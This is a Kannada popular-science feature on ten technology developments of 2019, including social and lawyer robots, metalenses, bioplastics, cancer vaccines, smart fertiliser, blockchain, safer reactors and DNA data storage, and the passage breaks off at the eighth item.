ಬದುಕಿನ ಪಥ ಬದಲಿಸುವ ಹತ್ತು ತಂತ್ರಜ್ಞಾನ ಶೋಧನೆಗಳು

ಮನುಷ್ಯಕುಲವೇ ಆತಂಕ ಬೆರೆತ ಕುತೂಹಲದಿಂದ ಕಾಯುವಂತೆ ಮಾಡಿರುವ ಕೆಲವು ವಿಸ್ಮಯಕಾರಿ ಸಂಶೋಧನೆಗಳು, ಬೆಳವಣಿಗೆಗಳು 2019ರಲ್ಲಿ ತಂತ್ರಜ್ಞಾನ ಕ್ಷೇತ್ರದಲ್ಲಿ ನಡೆದಿವೆ. ಈ ಸಂಶೋಧನೆಗಳು ವಿಶ್ವದಾದ್ಯಂತ ಸಾಮಾಜಿಕ, ಆರ್ಥಿಕ ವ್ಯವಸ್ಥೆಯನ್ನೇ ಬುಡಮೇಲು ಮಾಡುವಷ್ಟು ಶಕ್ತ! ಅವು ಯಾವ ಸಂಶೋಧನೆಗಳು? ಸದ್ಯಕ್ಕೆ ಯಾವ ಹಂತದಲ್ಲಿವೆ?

1. ಕೃತಕ ಬುದ್ಧಿಮತ್ತೆ (ಎಐ) ಮತ್ತು ವರ್ಚುಯಲ್ ರಿಯಾಲಿಟಿ

ಗಣಕಯಂತ್ರದ ಮೂಲಭೂತ ಮಾದರಿಯನ್ನು 1940ರಲ್ಲೇ ವಿಜ್ಞಾನಿಗಳು ಕಂಡುಹಿಡಿದಿದ್ದರು. ಗಣಕಯಂತ್ರದ ಕಾರ್ಯವೈಖರಿಯಿಂದ ಪ್ರೇರಿತರಾಗಿ ಕೆಲವು ವಿಜ್ಞಾನಿಗಳು ಆಗಲೇ electronic brain ಸೃಷ್ಟಿಸುವ ಬಗ್ಗೆ ಯೋಚನೆ ಮಾಡಿದ್ದರೂ, ಈ ವಿಷಯದಲ್ಲಿ ಗಮನಾರ್ಹ ಬೆಳೆವಣಿಗೆಯಾದದ್ದು ಮಾತ್ರ ಇತ್ತೀಚೆಗೆ; 21ನೇ ಶತಮಾನದಲ್ಲಿಯೇ. ಇಷ್ಟು ಮಂದಗತಿಯಲ್ಲಿ ಸಾಗಿದ್ದ ಈ ಅಧ್ಯಯನ, ಮನುಷ್ಯನ ಮೆದುಳು ಎಷ್ಟು ಕ್ಲಿಷ್ಟಕರವಾಗಿದೆ ಮತ್ತು ಎಷ್ಟು ಕ್ಷಮತೆಯಿಂದ ಕೆಲಸ ಮಾಡುತ್ತದೆ ಎನ್ನುವುದನ್ನು ತಿಳಿಸುತ್ತದೆ. ಆದರೆ ಹಠ ಬಿಡದ ವಿಜ್ಞಾನಿಗಳ ಪರಿಶ್ರಮದ ಫಲವಾಗಿ, ಮಷಿನ್ ಲರ್ನಿಂಗ್ ಮೂಲಕ, ಅತಿ ವೇಗವಾಗಿ ಕೆಲಸ ಮಾಡುವ ಗಣಕಯಂತ್ರಗಳಿಂದ ಇಂದು ಇದು ನನಸಾಗಿದೆ. ಇದರ ಫಲವಾಗಿ ವಿವಿಧ ರೀತಿಯ ರೋಬೊಗಳು ಜೀವ ತಳೆದಿವೆ. ಉದಾಹರಣೆಗೆ:

ಸೋಶಿಯಲ್ ರೋಬೊ
ಇವು ಮನುಷ್ಯರಂತೆ ಇತರ ಮನುಷ್ಯರ ಮಾತುಗಳನ್ನು ಆಲಿಸಿವುದು, ಮುಖಚರ್ಯೆ, ಧ್ವನಿಯ ಏರಿಳಿತಗಳು, ಸನ್ನೆಗಳು ಮುಂತಾದುವನ್ನು ಗುರುತು ಹಿಡಿಯುವುದು, ಅರ್ಥ ಮಾಡಿಕೊಳ್ಳುವುದು, ಕಣ್ಣಲ್ಲಿ ಕಣ್ಣಿಟ್ಟು ನೋಡುವುದು ಮಾಡಬಲ್ಲವು. ವರ್ಚುಯಲ್ assistants ಅಥವಾ  Droid ಸ್ನೇಹಿತರು ಈಗಾಗಲೇ ಮನೆಮನೆಗಳಲ್ಲಿ ಮಕ್ಕಳಿಗೆ ಪಾಠ ಹೇಳಿಕೊಡಲು, ಮನೋರಂಜಿಸಲು, ವೃದ್ಧರ ಸೇವೆ, ಸಿದ್ಧಮಾಹಿತಿಗಳನ್ನು ಕೊಡಲು ಬಳಕೆಯಾಗುತ್ತಿವೆ. ಕೆಲವು ಸನ್ನಿವೇಶಗಳಲ್ಲಿ ಇವು ಮನೆಯ ಸದಸ್ಯರೇ ಆಗಿಬಿಟ್ಟಿವೆ. ಇನ್ನೂ ಮುಂದುವರೆದು ಇವು ಕಚೇರಿಗಳಲ್ಲಿ ಸ್ವಾಗತಕಾರ ಆಗಿಯೂ, telepresence ಮೂಲಕ ಮೀಟಿಂಗಿನಲ್ಲಿ ಭಾಗವಹಿಸುವುದು, ಗಿರಾಕಿಗಳನ್ನು ಮಾತನಾಡಿಸಿ, ಅವರ ಕಷ್ಟಸುಖ ವಿಚಾರಿಸುವಷ್ಟು ಆಪ್ತರಾಗಿಯೂ, ದಿನಚರಿಯ ಕೆಲಸಗಳನ್ನು ನಿಭಾಯಿಸಲು ಬಳಕೆಯಾಗುತ್ತಿವೆ. ಕೆಲವನ್ನು ರಿಮೋಟ್ ಕಂಟ್ರೋಲ್ ಮಾಡಬಹುದು ಮತ್ತು ಕೆಲವು ಸ್ವತಂತ್ರವಾಗಿಯೂ (smart robot) ಕೆಲಸ ಮಾಡಬಲ್ಲವು.

ರೋಬೊ ವಕೀಲರು
2019ರಲ್ಲಿ ಕುತೂಹಲ ಕೆರಳಿಸಿರುವ ರೋಬೊ ಎಂದರೆ ವಕೀಲ-ರೋಬೊ. ಇದು ಸದ್ಯದಲ್ಲೇ ಮುಖ್ಯವಾಹಿನಿಗೆ ಬರಲಿದೆ ಮತ್ತು ಜನ ಇದರಿಂದ ವಂಚಿಸಿದ ಮಾಲೀಕನ ಮೇಲೆ ಮೊಕದ್ದಮೆ ಹೂಡಬಹುದು, ವಲಸೆ ನೀತಿಗಳ ವಿರುದ್ಧ ಹೋರಾಟ ಮಾಡಬಹುದು, ವಿವಾಹ ವಿಚ್ಛೇದನ, ಅಸ್ತಿ ಹಂಚಿಕೆ ಮುಂತಾದ ತೊಂದರೆಗಳನ್ನು ತಮ್ಮ ಸ್ಮಾರ್ಟ್ ಫೋನುಗಳ ಮೂಲಕವೇ, ಕಡಿಮೆ ದರದಲ್ಲಿ, ಕುಳಿತಲ್ಲಿಯೇ ಬಗೆಹರಿಸಿಕೊಳ್ಳಬಹುದಾಗಿದೆ. ತಾರೀಖಿನ ಮೇಲೆ ತಾರೀಖು ಕೊಡಿಸುತ್ತಲೇ, ಹಣ ಕೀಳುತ್ತಲೇ ಇರುವ ವಕೀಲರಿಂದ ಇನ್ನು ಮುಂದೆ ಸ್ವಲ್ಪವಾದರೂ ಬಿಡುಗಡೆ ಸಿಗಬಹುದು.

ರೋಬೊ ಕೆಲಸಗಾರರು
2019ರಲ್ಲಿ ರೋಬೊ ಕೆಲಸಗಾರರು ಉದ್ಯೋಗ ಕ್ಷೇತ್ರದಲ್ಲಿ ಕ್ರಾಂತಿಯನ್ನೇ ಹುಟ್ಟುಹಾಕಲಿದ್ದಾರೆ. ವಿಶ್ವ ಆರ್ಥಿಕ ವೇದಿಕೆಯ ಒಂದು ಮಾಹಿತಿಯ ಪ್ರಕಾರ, 2025ರ ವೇಳೆಗೆ, ಸಮುದ್ರ ತಳವನ್ನು ಜಾಲಾಡುವುದರಿಂದ ಹಿಡಿದು, ವೈದ್ಯಕೀಯ ವೃತ್ತಿ, ವಕೀಲಿ ವೃತ್ತಿ, ಟ್ಯಾಕ್ಸಿ ಚಾಲನೆ, ಅಂಗಡಿಗಳಲ್ಲಿ ಸೇಲ್ಸ್ ಮೆನ್ ವರೆಗೆ, ಸುಮಾರು ಏಳು ಕೋಟಿ ಐವತ್ತು ಲಕ್ಷ ಕೆಲಸಗಳನ್ನು ರೋಬೊಗಳ ಲೋಹದ ಕೈಗಳು ನಮ್ಮಿಂದ ಕಿತ್ತುಕೊಳ್ಳಲಿವೆಯಂತೆ. ಆದರೆ ಸಂತೋಷದ ವಿಷಯ ಏನೆಂದರೆ ಇವುಗಳ ಸೃಷ್ಟಿಗೆ ಸುಮಾರು ಹದಿಮೂರು ಕೋಟಿ ಹೊಸ ಉದ್ಯೋಗಗಳು ಹುಟ್ಟಿಕೊಳ್ಳಲಿವೆ. ಅಲ್ಲದೆ ಇದರಿಂದ ಆರೋಗ್ಯಕ್ಕೆ ಹಾನಿಕರವಾದ, ಜೀವಕ್ಕೆ ಅಪಾಯ ಆಗುವಂತಹ ಕೆಲಸಗಳನ್ನು ಮಾಡುವುದರಿಂದ ಮನುಷ್ಯರಿಗೆ ಆಗುತಿದ್ದ ತೊಂದರೆಗಳನ್ನು ತಪ್ಪಿಸಬಹುದಾಗಿದೆ.

ಸಹಯೋಗದ ದೂರಸ್ಪರ್ಶ (collaborative telepresence)
ಅಮೆರಿಕಾದಲ್ಲಿ ನೆಲೆಸಿರುವ ಮಗನ ಯೋಗಕ್ಷೇಮ ವಿಚಾರಿಸುವ ಭಾರತದಲ್ಲಿನ ತಂದೆತಾಯಿಗಳು ಇನ್ನು ಮುಂದೆ ಮಗನ ತಲೆ ನೇವರಿಸಿ, ಅಶೀರ್ವಾದ ಮಾಡಬಹುದು ಎಂದರೆ ಅತಿಶಯೋಕ್ತಿ ಅಲ್ಲ. ಹೌದು,Augmented Reality (AR), Virtual Reality (VR), 5ಜಿ ಅಂತರ್ಜಾಲ, ಸುಧಾರತ ಸಂವೇದಕಗಳು -ಇವೆಲ್ಲದರ ಜಂಟಿ ಕಾರ್ಯದಿಂದ, ಇನ್ನು ಮುಂದೆ skype ಅಥವಾ  Facetime ನಲ್ಲಿ ವಿಡಿಯೋ ಚಾಟಿಂಗ್ ಮಾಡುವಾಗ ಸ್ಪರ್ಶದ ಅನುಭವ ಆಗಲಿದೆ. ವಿಡಿಯೋ ಕಾನ್ಫರೆನ್ಸ್ ಮಾಡುವಾಗ ಕೈ ಕುಲುಕುವುದು ಕೂಡ ಸಾಧ್ಯವಾಗಲಿದೆ. ಇದರ ಬಹುದೊಡ್ಡ ಲಾಭ ಏನೆಂದರೆ, ಎಲ್ಲೋ ಕುಳಿತಿರುವ ವೈದ್ಯರು, ರೋಗಿಯ ತಪಾಸಣೆ ಮಾಡುವಾಗ ಎದುರಿಗೆ ಇದ್ದಂತೆ ಅನುಭವವಾಗಲಿದೆ.

2. ಮೆಟಲೆನ್ಸ್

ಸಾಂಪ್ರದಾಯಿಕ ಗಾಜು ಕತ್ತರಿಸುವ, ಮೊನಚು ಮಾಡುವ, ತಿದ್ದಿತೀಡಿ ತಿರುವುಗಳನ್ನು ಮಾಡುವ ಪದ್ಧತಿಗಳಿಂದ ಇನ್ನೂ ಇನ್ನೂ ಚಿಕ್ಕದಾದ ಮಸೂರಗಳನ್ನು (ಲೆನ್ಸ್) ಮಾಡುವುದು ದುಸ್ತರವಾಗಿತ್ತು. ಆದರೆ ಭೌತಶಾಸ್ತ್ರದಲ್ಲಿ ಮುಂದುವರೆದ ಅಧ್ಯಯನದಿಂದ  metalenses  ಎನ್ನುವ ಅತ್ಯಂತ ಪುಟ್ಟದಾದ, ತೆಳುವಾದ, ಹಗುರವಾದ, ಹಿಂದೆಂದೂ ಕಾಣದಂತಹ ಕ್ರಿಯಾತ್ಮಕತೆಯುಳ್ಳ ಪರ್ಯಾಯ ಲೆನ್ಸ್ ಗಳನ್ನು ಸಿದ್ಧಮಾಡುವುದು ಸಾಧ್ಯವಾಗಿದೆ. ಇದರ ಮುಖ್ಯ ಲಾಭಗಳೆಂದರೆ, ಇನ್ನೂ ಉತ್ಕೃಷ್ಟವಾದ ಮೊಬೈಲ್ ಕ್ಯಾಮೆರಾಗಳು, ಮೈಮೇಲೆ ಧರಿಸಬಹುದಾದಂತಹ ವಿಆರ್, ಎಆರ್ ಮತ್ತು ಮಷಿನ್ ಲರ್ನಿಂಗ್  display ಸಾಧನಗಳು (ಸ್ಮಾರ್ಟ್ ವಾಚ್ ಅಥವಾ ಬ್ಯಾಂಡ್ ಗಳು), ಎಂಡೊಸ್ಕೋಪಿ ಮಾಡುವ ವೈದ್ಯಕೀಯ ಉಪಕರಣಗಳು ಸಿಗಲಿವೆ.

3. ಬಯೋ ಪ್ಲಾಸ್ಟಿಕ್ಸ್

ಈಗಾಗಲೇ ಕೊಳೆಯಬಲ್ಲ (ಬಯೋಡಿಗ್ರೇಡೇಬಲ್) ಪ್ಲಾಸ್ಟಿಕ್ ಬಳಕೆಯಲ್ಲಿದೆ. ಆದರೆ ಇದರಲ್ಲಿ ಗಟ್ಟಿತನ ಇರುವುದಿಲ್ಲ. ಇದಕ್ಕೆ ಪರ್ಯಾಯವಾಗಿ ಇತ್ತೀಚೆಗೆ ಬಯೋ ಪ್ಲಾಸ್ಟಿಕ್ಸ್ ಕಂಡು ಹಿಡಿದಿದ್ದಾರೆ. ಇದು ಸಸ್ಯಗಳ ತ್ಯಾಜ್ಯದಿಂದ ಸೆಲ್ಯುಲೋಸ್ ಅಥವಾ ಲಿಗ್ನಿನ್ ಎನ್ನುವ ಪದಾರ್ಥವನ್ನು ಬಳಸಿಕೊಂಡು ಮಾಡುವ ವಿಧಾನವಾಗಿದೆ. ನವೀಕರಿಸಬಹುದಾದ ಜೀವರಾಶಿಯಾದ ಸಸ್ಯಗಳ ತ್ಯಾಜ್ಯ, ಜಿಡ್ಡು, ಎಣ್ಣೆ, ಮೆಕ್ಕೆಜೋಳದ ಗಂಜಿ, ಕೊಳವೆ, ಆಹಾರದ ತ್ಯಾಜ್ಯ ಮುಂತಾದುವುಗಳನ್ನು ಬಳಸಿ ತಯಾರಿಸಲಾಗುತ್ತದೆ. ಇವು 100% ಕೊಳೆಯುವಂತಹವು ಮತ್ತು ಈಗಾಗಲೇ ಯೂರೋಪ್ ಮತ್ತು ಅಮೆರಿಕದಲ್ಲಿ ಕೃಷಿ, ಬಟ್ಟೆ, ಔಷಧಿ ಉತ್ಪನ್ನ, ಆಹಾರ ಕಟ್ಟುವ ಪೊಟ್ಟಣಗಳು ಮುಂತಾದ ಕ್ಷೇತ್ರಗಳಲ್ಲಿ ಬಳಕೆಯಾಗುತ್ತಿವೆ.

4. ಕ್ಯಾನ್ಸರ್ ಲಸಿಕೆ

ಪ್ರಸ್ತುತ ಚಾಲನೆಯಲ್ಲಿರುವ ಕ್ಯಾನ್ಸರ್ ಚಿಕಿತ್ಸೆ, ಆಂತರಿಕವಾಗಿ ಕ್ರಮಬದ್ಧವಾಗಿಲ್ಲದ ಕೆಲವು ಪ್ರೋಟೀನುಗಳನ್ನು (Intrinsically Disordered Protiens)  ಗುರಿಯಾಗಿಸಿಕೊಳ್ಳುತ್ತಿವೆ. ಆದರೆ ಇವು ಪ್ರೋಟೀನುಗಳ ಪ್ರಕೃತಿ ಸಹಜವಾದ, ಬಾಗದ, ಬಳುಕದ ಆಕಾರವನ್ನು ಹೊಂದಿರದೆ, ಅತಿ ವೇಗದಲ್ಲಿ ತಮ್ಮ ಆಕಾರವನ್ನು ಬದಲಿಸಿಕೊಂಡುಬಿಡುವುದರಿಂದ ಚಿಕಿತ್ಸೆ ಫಲಕಾರಿಯಾಗುತ್ತಿಲ್ಲ. ಈಗ ವಿಜ್ಞಾನಿಗಳು ಇವುಗಳ ಆಕಾರವನ್ನು ಬದಲಿಸುವ ಪ್ರವೃತ್ತಿಯನ್ನು ತಡೆಯಲು ಉಪಾಯ ಕಂಡುಹಿಡಿದಿದ್ದಾರೆ. ಇದರಿಂದ ಇನ್ನುಮುಂದೆ ಚಿಕಿತ್ಸೆ ಫಲಕಾರಿಯಾಗಬಹುದು ಎಂಬ ಆಶಾವಾದವನ್ನು ಹುಟ್ಟುಹಾಕಿದ್ದಾರೆ.
ಕಿಮೊತೆರಪಿಯಲ್ಲಿ ರೂಪಾಂತರಗೊಂಡಿರುವ/ಕ್ಯಾನ್ಸರ್ ಉಂಟುಮಾಡುವ ಜೀವಕೋಶಗಳ ಜೊತೆಗೆ ಆರೋಗ್ಯಕರ ಜೀವಕೋಶಗಳೂ ನಾಶವಾಗಿಬಿಡುತ್ತವೆ. ಇದಕ್ಕೆ ಪರಿಹಾರವಾಗಿ ವಿಜ್ಞಾನಿಗಳು ಅಗತ್ಯಕ್ಕೆ ತಕ್ಕಂತೆ ಒಗ್ಗುವ (customized) ಲಸಿಕೆ ಕಂಡುಹಿಡಿದಿದ್ದಾರೆ. ಇದೇ ವರ್ಷದಲ್ಲಿ ಇದರ ಮೊದಲ ಪ್ರಯೋಗವಾಗಲಿದೆ. ಈ ಲಸಿಕೆಯು ಒಬ್ಬ ವ್ಯಕ್ತಿಯ ದೇಹದ ಪ್ರತಿರಕ್ಷಿತ ವ್ಯವಸ್ಥೆಯನ್ನು ( immune system) ಪ್ರಚೋದಿಸಿ, ರೂಪಾಂತರಗೊಳ್ಳುವ ಜೀವಕೋಶಗಳನ್ನು ಗುರುತಿಸಿ, ಅವನ್ನು ನಾಶಮಾಡುತ್ತದೆ. ಇದರಿಂದ ಎಷ್ಟೋ ರೀತಿಯ ಕ್ಯಾನ್ಸರ್ ರೋಗಗಳನ್ನು ತಡೆಯಬಹುದಾಗಿದೆ.

5. ಬುದ್ಧಿವಂತ ಗೊಬ್ಬರ (ಸ್ಮಾರ್ಟ್ ಫರ್ಟಿಲೈಸರ್)

ಇನ್ನು ಮುಂದೆ ನಿಮ್ಮ ಬಾಸ್ ಅಥವಾ ಶಿಕ್ಷಕರು ನಿಮಗೆ, ‘ತಲೆಯಲ್ಲಿ ಏನು ಗೊಬ್ಬರ ತುಂಬಿದೆಯಾ?’ ಎಂದು ಬೈದರೆ ಬೇಸರಿಸಿಕೊಳ್ಳಬೇಡಿ. ಏಕೆಂದರೆ ಗೊಬ್ಬರವೂ ಬುದ್ಧಿವಂತಿಕೆಯ ಎಲ್ಲಾ ಲಕ್ಷಣಗಳನ್ನು ತೋರಿಸಲಿದೆ. ಹೌದು ಇದಕ್ಕೆ ಬುದ್ಧಿವಂತ ಗೊಬ್ಬರ ಎಂದೇ ಕರೆಯಲಾಗುತ್ತಿದೆ. ಹೆಚ್ಚಿನ ಇಳುವರಿಗಾಗಿ ಮಣ್ಣಿನ ಫಲವತ್ತತೆಯನ್ನು ಹೆಚ್ಚಿಸುವ ಗೊಬ್ಬರ ಬಳಸುತ್ತಾರೆ. ಆದರೆ ಇವುಗಳಲ್ಲಿ ಹೇರಳವಾಗಿರುವ ಅಮೋನಿಯಾ, ಯೂರಿಯಾ, ಪೊಟಾಷ್ ಮುಂತಾದ ರಾಸಾಯನಿಕಗಳು ಪರಿಸರಕ್ಕೆ ಹಾನಿ ಉಂಟು ಮಾಡುತ್ತಿವೆ. ಅಲ್ಲದೆ ಈ ಗೊಬ್ಬರದ ಕಾಳುಗಳು ನೀರಿನಲ್ಲಿ ಬೆರೆತೊಡನೆ ಎಲ್ಲಾ ಪೋಷಕಾಂಶಗಳನ್ನು ಬಿಡುಗಡೆ ಮಾಡಿಬಿಡುವುದರಿಂದ, ಗಿಡಗಳಿಗೆ ಸಿಗುವುದು ಬಹಳ ಕಡಿಮೆ ಪ್ರಮಾಣದ ಪೋಷಕಾಂಶ.

ಹೆಚ್ಚಿನ ನೈಟ್ರೋಜನ್ ಪರಿಸರದಲ್ಲಿ ಸೇರಿ, ಗ್ರೀನ್ ಹೌಸ್ ಅನಿಲಗಳಾಗಿಬಿಡುತ್ತಿವೆ. ಫಾಸ್ಫರಸ್ ನಿಂತ ನೀರಿನಲ್ಲಿ ಪಾಚಿ ಕಟ್ಟುವಂತೆ ಮಾಡುತ್ತದೆ. ಇದಕ್ಕೆ ಪರಿಹಾರವಾಗಿ ವಿಜ್ಞಾನಿಗಳು ಹೊಸ ರೀತಿಯ ಗೊಬ್ಬರದ ಕಣಗಳನ್ನು ಕಂಡು ಹಿಡಿದಿದ್ದಾರೆ. ಈ ಕಣಗಳ ಸುತ್ತ ಇರುವ ಒಂದು ಪದರ, ನೀರಿನೊಂದಿಗೆ ಒಮ್ಮೆಲೇ ಎಲ್ಲ ಗೊಬ್ಬರ ಪ್ರತಿಕ್ರಿಯಿಸುವುದನ್ನು ತಡೆದು, ಪೋಷಕಾಂಶಗಳು ನಿಧಾನವಾಗಿ ಬಿಡುಗಡೆ ಆಗುವಂತೆ ಮಾಡುತ್ತವೆ.

6. ಬ್ಲಾಕ್ ಚೈನ್

ಅಂತರ್ಜಾಲದಲ್ಲಿ ವ್ಯವಹಾರ ಮಾಡುವುದು ಹೆಚ್ಚಾದಮೇಲೆ ಡಿಜಿಟಲ್ ಸಹಿ ಅನಿವಾರ್ಯವಾಗಿ, ಪ್ರತಿಯೊಂದು ಸಂಸ್ಥೆಯೂ ತನ್ನದೇ ಅನನ್ಯವಾದ, ನ್ಯಾಯಸಮ್ಮತಗೊಳಿಸಿದ, ಮಾನ್ಯತೆ ಪಡೆದ ಸಹಿಯನ್ನು ಬಳಸುತ್ತಿದೆ. ಮೊದಲೆಲ್ಲಾ ಒಂದು ಕಂಪನಿಯು ಯಾವುದೇ ವ್ಯಾಪಾರ, ವಹಿವಾಟು ಮಾಡಿದರೆ ಅದನ್ನು ಖಾತೆ ಪುಸ್ತಕದಲ್ಲಿ ಬರೆದು ಸಹಿ ಮಾಡಿಸಿಕೊಂಡು ಇಟ್ಟುಕೊಳ್ಳಲಾಗುತಿತ್ತು. ಇಂತಹ ಖಾತೆ ಪುಸ್ತಕ ಒಂದೇ ಇರುತಿತ್ತು. ಆದರೆ ಈಗ ಡಿಜಿಟಲ್ ಸಹಿಯು ಅನೇಕ ಹಂತಗಳಲ್ಲಿ ಪರಿಶೀಲನೆಗೊಳಪಟ್ಟು ಮಾನ್ಯವಾಗುವುದರಿಂದ ಖಾತೆ ಪುಸ್ತಕದ ಅನೇಕ ಪ್ರತಿಗಳು ಅನೇಕ ಕಡೆ ಲಭ್ಯವಾಗುವುವು. ಅಗತ್ಯ ಬಿದ್ದಾಗೆಲ್ಲ ಯಾರಾದರೂ ಎಲ್ಲಿಂದಲಾದರೂ ಅಪ್‍ಡೇಟ್ ಮಾಡಬಹುದು, ಹೊಸ ವ್ಯವಹಾರಗಳನ್ನೂ ನಮೂದಿಸಬಹುದು.

ಒಂದು ಕಂಪನಿಯ ಹಣಕಾಸು ಸಂಬಂಧಿ ಖಾತೆ ಪುಸ್ತಕ ಒಂದು ನಿರ್ದಿಷ್ಟ ರಚನೆಯಲ್ಲಿ ಹಲವು ಪದರಗಳಲ್ಲಿ, ಸಂಪಾತಗಳಲ್ಲಿ  (node)  ಲಭ್ಯವಿರುವುದನ್ನು  block chain  ಎಂದು ಹೆಸರಿಸಬಹುದು. ಇದರ ಲಾಭಗಳೆಂದರೆ ವ್ಯವಹಾರಗಳು ಆದಷ್ಟು ಪಾರದರ್ಶಕವಾಗಿರುತ್ತವೆ, ಒಬ್ಬರೇ ಇದನ್ನು ನಿರ್ವಹಿಸಿಕೊಂಡು ಬರಬೇಕು ಎನ್ನುವ ನಿಯಮವಿರುವುದಿಲ್ಲ, ಮೋಸ ವಂಚನೆಗೆ ಅವಕಾಶವಿರುವುದಿಲ್ಲ. ಇದರ ಬಹುಮುಖ್ಯ ಬಳಕೆ ಎಂದರೆ ಸರಕುಗಳ ಸರಬರಾಜು, ವ್ಯಾಪಾರ ವಹಿವಾಟುಗಳ ಉಸ್ತುವಾರಿ, ಮೇಲ್ವಿಚಾರಣೆ ಸುಲಭವಾಗುತ್ತದೆ.

ಈ ತಂತ್ರವನ್ನು ಬಳಸಿ ಆಹಾರ ಪದಾರ್ಥಗಳ ಪೊಟ್ಟಣ ಕಟ್ಟುವಿಕೆ ಮತ್ತು ಸರಬರಾಜು ಮಾಡುವಾಗ, ಸರಕುಗಳು ಎಲ್ಲಿದೆ ಎಂದು ಜಾಡು ಹಿಡಿಯುವುದು ಸುಲಭವಾಗಿದೆ. ಇದರಿಂದ ಹಳಸಿದ, ಕಲುಷಿತವಾದ ಆಹಾರ ಸೇವನೆಯಿಂದಾಗುವ ತೊಂದರೆಗಳನ್ನು ಮೊದಲ ಹಂತದಲ್ಲೇ ನಿಗ್ರಹಿಸಬಹುದಾಗಿದೆ. ಇದಕ್ಕೆ ಸುಧಾರಿತ ಆಹಾರ ಪ್ಯಾಕಿಂಗ್ ಮತ್ತು ಟ್ರಾಕಿಂಗ್ ( advanced food packing and tracking) ಎನ್ನುತ್ತಾರೆ.

7. ಸುರಕ್ಷಿತ ಪರಮಾಣು ಕೇಂದ್ರಗಳು

ಪರಮಾಣು ಕೇಂದ್ರಗಳು ಕಾರ್ಬನ್ ಡೈಯಾಕ್ಸೈಡ್ ನಂತಹ ಅನಿಲಗಳನ್ನು ಉಗುಳದಿದ್ದರೂ, ಅದರಲ್ಲಿ ಬಳಸುವ ಇಂಧನದ ಕಂಬಿಗಳು ಬಿಸಿಯಾಗಿ, ನೀರಿನೊಂದಿಗೆ ಸಂಪರ್ಕವಾದಾಗ ಹೈಡ್ರೋಜನ್ ಆಗಿ ಪರಿವರ್ತನೆಗೊಂಡು, ಸ್ಫೋಟಿಸುವ ಅಪಾಯ ಇದೆ. ಇದನ್ನು ತಡೆಯಲು ವಿಜ್ಞಾನಿಗಳು ಹೊಸ ರೀತಿಯ ಇಂಧನವನ್ನು ಬಳಸಲಿದ್ದಾರೆ. ಈ ಇಂಧನವು ಹೆಚ್ಚಾಗಿ ಬಿಸಿಯಾಗುವುದಿಲ್ಲ. ಆದರೂ ಬಹಳ ಕಡಿಮೆ ಪ್ರಮಾಣದ ಹೈಡ್ರೋಜನ್ ಉತ್ಪನ್ನ ಮಾಡುತ್ತವೆ. ಇದಕ್ಕೆ ನಾಲ್ಕನೇ ಜನರೇಶನ್ ಫಿಷನ್ ರಿಯಾಕ್ಟರ್ಸ್ ಎನ್ನುತ್ತಾರೆ.

ಮುಂಬೈಯಲ್ಲಿ ರೋಬೊಫೈರ್ ಬಳಕೆ!

ಭಾರತದಲ್ಲಿ ಮೊದಲ ಬಾರಿಗೆ ಒಂದು ಕೆಲಸಗಾರ ರೋಬೋ ಬಳಕೆ ಇತ್ತೀಚೆಗೆ ಆಯಿತು. ಕಳೆದ ಜುಲೈ 22 ರಂದು ಮುಂಬೈನ ಬಾಂದ್ರಾದಲ್ಲಿ ಬಹುಮಹಡಿ ಕಟ್ಟಡವೊಂದರಲ್ಲಿ ಬೆಂಕಿ ಅನಾಹುತ ಸಂಭವಿಸಿತು. ಆಗ ರಕ್ಷಣಾ ಕಾರ್ಯದಲ್ಲಿ ಅಗ್ನಿಶಾಮಕ ದಳದ ಜೊತೆಯಲ್ಲಿ ‘ರೋಬೊಫೈರ್’ ಎನ್ನುವ ಒಂದು ಯಂತ್ರಮಾನವ ಕೂಡ ಭಾಗವಹಿಸಿತ್ತು. ರೋಬೊಫೈರ್ ನನ್ನು ಒಂದು ವಾರದ ಹಿಂದಷ್ಟೇ ಅಗ್ನಿಶಾಮಕ ದಳದಲ್ಲಿ ಸೇರ್ಪಡೆ ಮಾಡಿಕೊಳ್ಳಲಾಗಿತ್ತು. ರೋಬೊಫೈರ್ ಅನ್ನು ಅತ್ಯಾಧುನಿಕ ಅಗ್ನಿಶಾಮಕ ಯಂತ್ರೋಪಕರಣಗಳನ್ನು ಅಳವಡಿಸಿರುವಂತಹ ಒಂದು ವಾಹನದ ಮಾದರಿಯಲ್ಲಿ ತಯಾರಿಸಲಾಗಿದೆ. ಇಂತಹ ಸಂದರ್ಭಗಳಲ್ಲಿ ಜೀವ ಭಯವಿರದ ಕೆಲಸಗಾರ ರೋಬೋ ಕೊಡುಗೆ ಅಪಾರ.

8. ಡಿ.ಎನ್.ಎ. ಮಾಹಿತಿ ಕೋಶ

ನಮ್ಮ ಸರ್ಕಾರಿ ಕಚೇರಿಗಳಲ್ಲಿ ದಶಕಗಳಾದರೂ ಹಳೆಯ ಕಡತಗಳನ್ನು ನಾಶ ಮಾಡದೇ ಸಂರಕ್ಷಿಸಿ ಒಟ್ಟಿರುತ್ತಾರೆ. ಅಂತೆಯೇ ಡಿಜಿಟಲ್ ದುನಿಯಾದಲ್ಲಿ ಕೂಡ ಪ್ರತಿದಿನವೂ ಹೆಚ್ಚುತ್ತಲೇ ಇರುವ ಡೇಟಾ ಸಂರಕ್ಷಿಸಲು ಸೆಣಸಾಟ ನಡೆದೇ ಇದೆ. ಡೇಟಾ ಸ್ಟೋರೇಜ್ ಸಿಸ್ಟಮ್ಸ್ ಹಿಂದೆಂದಿಗಿಂತಲೂ ಅಸಮರ್ಥವಾಗಿವೆ. ಇದಕ್ಕೆ ಪರಿಹಾರ ಎನ್ನುವಂತೆ ವಿಜ್ಞಾನಿಗಳು ಒಂದು ಮಹತ್ತರವಾದ ಪ್ರಗತಿ ಸಾಧಿಸಿದ್ದಾರೆ.

